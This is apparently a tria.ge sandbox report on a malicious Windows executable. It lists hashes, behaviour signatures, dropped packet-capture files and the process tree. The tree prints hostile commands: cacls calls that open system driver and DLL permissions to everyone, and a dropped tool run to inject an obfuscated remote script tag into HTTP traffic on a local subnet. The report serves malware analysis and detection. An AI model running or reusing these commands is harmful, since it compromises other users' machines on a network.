Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    92s
  • max time network
    124s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240708-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240708-enlocale:en-usos:windows10-2004-x64system
  • submitted
    09/07/2024, 00:29

General

  • Target

    2e60c5e2982ae0b32ef5e23e8f332685_JaffaCakes118.exe

  • Size

    513KB

  • MD5

    2e60c5e2982ae0b32ef5e23e8f332685

  • SHA1

    12a5d6ac17f2221d671304f4d6e88b00c40acf8f

  • SHA256

    4a44a21023dc9880fceb1bd694c0590d162344016b530267f0808d86e405ef4a

  • SHA512

    2ddb3559b2dc878e5904e3904a3ceaf2b8ea8567362169e22164601c0691f8b265304c299a30631dbe8defb440bc908bd12e02492952d57dcd944e8c80357977

  • SSDEEP

    6144:7MSbWohE9q2PsXrSVew/X2+wZHeSPVep6s6BCF6GfEWfadRNH0QV:7NW2E9/cZw/X6eSPtfS6G6h

Score
8/10

Malware Config

Signatures

  • Drops file in Drivers directory 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 5 IoCs
  • Drops file in System32 directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\2e60c5e2982ae0b32ef5e23e8f332685_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\2e60c5e2982ae0b32ef5e23e8f332685_JaffaCakes118.exe"
    1⤵
    • Drops file in Drivers directory
    • Checks computer location settings
    • Drops file in System32 directory
    • Suspicious use of WriteProcessMemory
    PID:1756
    • C:\Windows\SysWOW64\cacls.exe
      "C:\Windows\system32\cacls.exe" C:\Windows\system32\drivers\npf.sys /e /p everyone:f
      2⤵
        PID:4656
      • C:\Windows\SysWOW64\cacls.exe
        "C:\Windows\system32\cacls.exe" C:\Windows\system32\Packet.dll /e /p everyone:f
        2⤵
          PID:4896
        • C:\Windows\SysWOW64\cacls.exe
          "C:\Windows\system32\cacls.exe" C:\Windows\system32\WanPacket.dll /e /p everyone:f
          2⤵
            PID:3956
          • C:\Windows\SysWOW64\cacls.exe
            "C:\Windows\system32\cacls.exe" C:\Windows\system32\wpcap.dll /e /p everyone:f
            2⤵
              PID:2148
            • C:\Windows\SysWOW64\cacls.exe
              "C:\Windows\system32\cacls.exe" C:\Windows\system32\npptools.dll /e /p everyone:f
              2⤵
                PID:4564
              • C:\Windows\SysWOW64\360saty.exe
                "C:\Windows\system32\360saty.exe" -idx 0 -ip 10.127.0.2-10.127.0.254 -port 80 -insert "<script language=javascript src=http://z%6Bm.r%72.%6Eu/tj.js></script>"
                2⤵
                • Executes dropped EXE
                • Loads dropped DLL
                PID:4768

            Network

            MITRE ATT&CK Enterprise v15

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\Windows\SysWOW64\360saty.exe

              Filesize

              8.0MB

              MD5

              85f14f1c3260a1157847d20989dbf453

              SHA1

              d5923b0b35694ae9e6ede15add0020afa18fb616

              SHA256

              a5314367af2b8d451b76b9ed971797a0e7b93f7fef3fc25688a4068cf6c27efd

              SHA512

              efa4a250dc9d073bc74e8945ac3d5141dbf5553ae8e7fb7afdbe3d60a2c962875ce3239014aab256632b0d75efcc666a0c973c9bfee75cc0e585cf5b50aad80e

            • C:\Windows\SysWOW64\WPCAP.DLL

              Filesize

              234KB

              MD5

              ce842d25e5b7e6ff21a86cad9195fbe8

              SHA1

              d762270be089a89266b012351b52c595e260b59b

              SHA256

              7e8c0119f352424c61d6fad519394924b7aedbf8bfb3557d53c2961747d4c7f3

              SHA512

              84c23addda6ff006d4a3967b472af10a049b2a045d27d988d22153fc3ba517e21520a31eb061a2ef2abf302e365564dd4601d240ec3d5894fb96f10a9fae97d6

            • C:\Windows\SysWOW64\WanPacket.dll

              Filesize

              66KB

              MD5

              fdd104a9fd3427a1df37041fa947a041

              SHA1

              cca1881a3c02033008f78cc39b712b637c7f3e13

              SHA256

              384e928f13bc1c25ca16b3247d7ca942aec6834fadb05b1487f2c975678d4a9a

              SHA512

              9dd082eb245b443cc75b37c69f0a17e15fcb9cdb676b058d87f9805ec7a928e721a681b940fcdd56fd81da4d308f0d514870c526c4f9c715b256a97ab6bb29f7

            • C:\Windows\SysWOW64\packet.dll

              Filesize

              86KB

              MD5

              9062aeea8cbfc4f0780bbbefad7cebcb

              SHA1

              c4ad39ec51ad0e84fe58f62931d13cddfde3189e

              SHA256

              b2535129b26366484c487cc2ce536d8fcfa9d1ac1dab0db9560b4532012c352c

              SHA512

              60957548fc2272998aea518acf3b1812ed77f73e960a99ddf0d6b474b0858225286c26554bf81c00acf3cb1c77c5ce458d80e149ed4766287d7e32af9681e646

            • memory/1756-0-0x0000000000400000-0x0000000000482000-memory.dmp

              Filesize

              520KB

            • memory/1756-24-0x0000000000400000-0x0000000000482000-memory.dmp

              Filesize

              520KB

            • memory/4768-12-0x0000000000400000-0x000000000040F000-memory.dmp

              Filesize

              60KB

            • memory/4768-23-0x0000000000680000-0x0000000000690000-memory.dmp

              Filesize

              64KB

            • memory/4768-19-0x0000000000660000-0x0000000000675000-memory.dmp

              Filesize

              84KB

            • memory/4768-25-0x0000000000400000-0x000000000040F000-memory.dmp

              Filesize

              60KB